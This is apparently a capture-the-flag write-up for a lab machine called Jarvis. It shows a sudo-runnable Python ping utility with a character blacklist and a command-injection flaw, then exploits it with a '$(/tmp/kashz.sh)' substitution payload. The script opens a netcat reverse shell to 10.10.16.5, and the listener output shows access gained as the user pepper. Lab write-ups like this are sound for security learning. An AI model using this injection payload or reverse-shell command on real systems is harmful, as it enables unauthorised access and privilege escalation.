7 www-data > pepper

www-data@jarvis: sudo -u pepper /var/www/Admin-Utilities/simpler.py

# there is ping function that is executed when using flag -p
simpler.py
forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)
# tried using a custom ping; but then realized python PATH is different from sytem PATH
# as there's a forbidden list, def looks like command injection

Using https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.5 443' > /tmp/kashz.sh

www-data@jarvis:/tmp$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
***********************************************
     _                 _
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/
                                @ironhackers.es

***********************************************

Enter an IP: $(/tmp/kashz.sh)
# command is executed.

$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.10.143] 51808
whoami;id;hostname
pepper
uid=1000(pepper) gid=1000(pepper) groups=1000(pepper)
jarvis

Last updated